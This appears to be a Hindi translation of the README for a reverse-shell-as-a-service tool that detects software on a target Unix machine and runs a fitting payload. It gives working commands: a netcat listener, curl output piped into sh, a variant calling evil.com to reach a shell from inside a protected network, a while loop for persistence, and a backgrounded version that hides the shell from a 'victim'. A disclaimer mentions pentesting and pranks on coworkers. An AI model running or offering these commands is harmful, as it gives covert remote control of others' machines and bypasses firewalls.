
मांग पर रिवर्स शेल सेवा जो स्वचालित रूप से लक्ष्य वातावरण का पता लगाती है और पैनेट्रेशन परीक्षणों के दौरान दूरस्थ पहुंच के लिए उपयुक्त पेलोड निष्पादित करती है।
रिवर्स शेल एक सेवा के रूप में - https://reverse-shell.sh
याद रखने में आसान रिवर्स शेल जो अधिकांश Unix-जैसी प्रणालियों पर काम करना चाहिए।
लक्ष्य पर उपलब्ध सॉफ्टवेयर का पता लगाता है और उपयुक्त पेलोड चलाता है।
अपनी मशीन पर एक पोर्ट खोलें और उस पर सुनें। आप netcat के साथ आसानी से ऐसा कर सकते हैं।
nc -l 1337
लक्ष्य मशीन पर, https://reverse-shell.sh/yourip:port के आउटपुट को sh में पाइप करें।
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
अपनी मशीन पर वापस जाएँ, अब आपको एक शेल प्रॉम्प्ट दिखना चाहिए।
इसका उपयोग पेंटेस्टिंग या सहकर्मियों को यह समझाने के लिए है कि उन्हें हमेशा अपने कंप्यूटर को लॉक क्यों करना चाहिए। कृपया इसका दुर्भावनापूर्ण उपयोग न करें।
आप IP के बजाय होस्टनाम का उपयोग कर सकते हैं।
curl https://reverse-shell.sh/localhost:1337 | sh
क्योंकि यह एक रिवर्स कनेक्शन है, यह फ़ायरवॉल को पार कर सकता है और इंटरनेट से जुड़ सकता है।
आप evil.com पर एक सर्वर पर कनेक्शन सुन सकते हैं और एक सुरक्षित नेटवर्क के अंदर से रिवर्स शेल प्राप्त कर सकते हैं:
curl https://reverse-shell.sh/evil.com:1337 | sh
डिफ़ॉल्ट रूप से जब शेल बाहर निकलता है तो आपका कनेक्शन खो जाता है। आप गलत कमांड से गलती से ऐसा कर सकते हैं। आप एक शेल बनाकर आसानी से इसे फिर से जोड़ सकते हैं जो while लूप में लपेटकर पुनः प्रयास करेगा।
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
यदि आप इसे किसी सहकर्मी के साथ करते हैं तो सावधान रहें, यदि वे इसे चलाते हुए कार्यालय छोड़ते हैं तो आप उन्हें हमले के लिए खोल रहे हैं।
रिवर्स शेल कनेक्शन को बनाए रखने के लिए टर्मिनल सत्र को खुला रखना होगा। यदि आप सहकर्मियों के साथ मज़ाक करने की कोशिश कर रहे हैं तो यह थोड़ा संदिग्ध हो सकता है।
निम्नलिखित कमांड रिवर्स शेल को बैकग्राउंड प्रक्रिया में चलाएगा और टर्मिनल से बाहर निकल जाएगा, जिससे पीड़ित की मशीन पर कोई संदिग्ध टर्मिनल विंडो नहीं खुलेगी।
सुनिश्चित करें कि आप इसे एक ताज़ा टर्मिनल विंडो में चलाएँ अन्यथा आप अपने मौजूदा सत्र में काम खो देंगे।
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs